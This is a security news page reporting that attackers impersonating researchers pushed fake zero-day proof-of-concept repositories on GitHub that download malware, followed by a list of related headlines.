Security News > 2023 > June > Fake zero-day PoC exploits on GitHub push Windows, Linux malware
Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware.
These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research.
In all cases, the malicious repositories host a Python script that acts as a malware downloader for Linux and Windows systems.
The malware is saved to the Windows %Temp% or the Linux /home//.
North Korean Lazarus state-sponsored hacking group conducted a similar campaign in January 2021, when they created fake vulnerability researcher personas on social media to target researchers with malware and zero-days.
More recently, academics found thousands of repositories on GitHub offering fake proof-of-concept exploits for various vulnerabilities, some of them infecting users with malware, malicious PowerShell, obfuscated info-stealer downloaders, Cobalt Strike droppers, and more.
News URL
Related news
- EncryptHub Exploits Windows Zero-Day to Deploy Rhadamanthys and StealC Malware (source)
- APTs have been using zero-day Windows shortcut exploit for eight years (ZDI-CAN-25373) (source)
- PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware (source)
- ⚡ THN Weekly Recap: Alerts on Zero-Day Exploits, AI Breaches, and Crypto Heists (source)
- Seven Malicious Go Packages Found Deploying Malware on Linux and macOS Systems (source)
- Microsoft admits GitHub hosted malware that infected almost a million devices (source)
- Microsoft patches Windows Kernel zero-day exploited since 2023 (source)
- Unpatched Windows Zero-Day Flaw Exploited by 11 State-Sponsored Threat Groups Since 2017 (source)
- New Windows zero-day exploited by 11 state hacking groups since 2017 (source)
- Steam pulls game demo infecting Windows with info-stealing malware (source)